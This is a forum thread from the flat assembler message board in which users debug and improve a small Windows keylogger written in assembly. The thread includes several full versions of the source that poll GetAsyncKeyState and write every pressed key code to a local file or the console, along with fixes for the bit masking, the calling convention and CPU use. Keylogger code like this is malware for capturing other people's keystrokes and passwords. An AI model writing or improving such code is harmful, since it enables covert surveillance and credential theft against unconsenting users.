flat assembler
Message board for the users of flat assembler.

Index > Windows > Very small and stupid keylogger still not work

Author
Thread Post new topic Reply to topic
wsx



Joined: 27 May 2012
Posts: 3
wsx
I tried to write this very small keylogger but still doesn't work.
The code is very simple but don't understand why not write to file.
With a debugger I saw that fputc returns the character written!

Code:
format PE GUI 4.0
entry start
include 'win32a.inc'

start:
    invoke fopen, fName, mode     ;Open file
    mov [hLog], eax               ;Store handle
    xor ebx, ebx               ;Counter set to zero
getkey:
    invoke Sleep, 50             ;Wait 50ms
    inc bl                        ;Increment. If it exceeds 255, it will set to zero
    invoke GetAsyncKeyState, ebx
    cmp eax, -32767           ;If the key is pressed
    jne getkey
write:
    invoke fputc, ebx, [hLog]         ;Write vkCode to the file
    jmp getkey

fName db 'l09.txt',0
mode  db 'a',0
hLog  dd ?

data import
    library kernel32, 'kernel32.dll',\
           user32, 'user32.dll',\
           msvcrt, 'msvcrt.dll'
    include 'api\kernel32.inc'
    include 'api\user32.inc'
    import msvcrt,\
     fopen, 'fopen',\
         fputc, 'fputc'
end data    
Post 27 May 2012, 10:24
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17450
Location: In your JS exploiting you and your system
revolution
The msvcrt library needs cinvoke.

BTW: The return value from GetAsyncKeyState is ever going to be -32767 (0xffff8001)? Where did you get that value from?
Post 27 May 2012, 11:31
View user's profile Send private message Visit poster's website Reply with quote
wsx



Joined: 27 May 2012
Posts: 3
wsx
MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous"

Referring to a SHORT means 0x8001

Still not work Sad
Code:
format PE GUI 4.0
entry start
include 'win32a.inc'

start:
    cinvoke fopen, fName, mode    ;Open file
    mov [hLog], eax               ;Store handle
    xor ebx, ebx                  ;Counter set to zero
getkey:
    invoke Sleep, 50              ;Wait 50ms
    inc bl                        ;Increment. If it exceeds 255, it will set to zero
    invoke GetAsyncKeyState, ebx
    and ax, 0x8001
    cmp ax, 0x8001                ;If the key is pressed
    jne getkey
write:
    cinvoke fputc, ebx, [hLog]    ;Write vkCode to the file
    jmp getkey

fName db 'l09.txt',0
mode  db 'a',0
hLog  dd ?

data import
    library kernel32, 'kernel32.dll',\
            user32, 'user32.dll',\
            msvcrt, 'msvcrt.dll'
    include 'api\kernel32.inc'
    include 'api\user32.inc'
    import msvcrt,\
           fopen, 'fopen',\
           fputc, 'fputc'
end data    
Post 27 May 2012, 12:31
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17450
Location: In your JS exploiting you and your system
revolution
wsx wrote:
MSDN says: "If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous"

Referring to a SHORT means 0x8001
Return value is 32 bit. So masking is the right thing to do here.

You can use a debugger to verify values being returned.
Post 27 May 2012, 14:36
View user's profile Send private message Visit poster's website Reply with quote
wsx



Joined: 27 May 2012
Posts: 3
wsx
In fact, i used and operator (see above)

EDIT:
Work! The problem was the Sleep
But w/o Sleep steals a lot of CPU usage Sad
Post 27 May 2012, 15:19
View user's profile Send private message Reply with quote
AsmGuru62



Joined: 28 Jan 2004
Posts: 1412
Location: Toronto, Canada
AsmGuru62
Try to do the loop on a separate thread.
This may decrease CPU usage.
Post 27 May 2012, 16:00
View user's profile Send private message Send e-mail Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 17450
Location: In your JS exploiting you and your system
revolution
With a 50ms sleep you are only reading keys at 20 per second. Perhaps better to read all 256 key codes in one loop and then sleep 50ms between loops.
Code:
;...
    xor ebx, ebx                  ;Counter set to zero
getkey:
    invoke GetAsyncKeyState, ebx
    and ax, 0x8001
    cmp ax, 0x8001                ;If the key is pressed
    jne skipwrite
    cinvoke fputc, ebx, [hLog]    ;Write vkCode to the file
skipwrite:
    inc bl                        ;Increment. If it exceeds 255, it will set to zero
    jne getkey
    invoke Sleep, 50              ;Wait 50ms
    jmp getkey
;...    
Or just use GetKeyboardState
Post 27 May 2012, 16:31
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2913
Location: 0x77760000
typedef
here's what I wrote sometime ago

Code:
format pe console 4.0

include 'win32ax.inc'

entry main

section 'txt' code readable executable

main:
         invoke CreateThread,0,0,thread_logger,0,0,0
         invoke WaitForSingleObject,eax,0FFFFFFFh
;Say what ?, no it won't reach here


fmt db '0x%04X',10,0

proc    thread_logger,lpDat

        mov dword[ebp-4],1
reset:
        mov dword[ebp-4],1
for_loop:
        push dword[ebp-4]
        call [GetAsyncKeyState]
        cmp  eax,-32767
        jne  no_log

        push dword[ebp-4]
        push fmt
        call [printf]
        add esp, 8
no_log:
        inc  dword[ebp-4]
        cmp  dword[ebp-4],100000000b
        jnz for_loop

        push 09
        call [Sleep]
        jmp reset
endp

section '.idata' import data readable

library user32,'user32.dll',\
        kernel32,'kernel32.dll',\
        msvc,'msvcrt.dll'

import msvc,\
       printf,'printf'

include 'api/user32.inc'
include 'api/kernel32.inc'

    


It grabs mouse buttons too.
Post 27 May 2012, 18:19
View user's profile Send private message Reply with quote
AdaS



Joined: 07 Jun 2013
Posts: 1
AdaS
this one works very well.[/url]

_________________
Smile
Post 07 Jun 2013, 09:43
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2020, Tomasz Grysztar. Also on YouTube, Twitter.

Website powered by rwasa.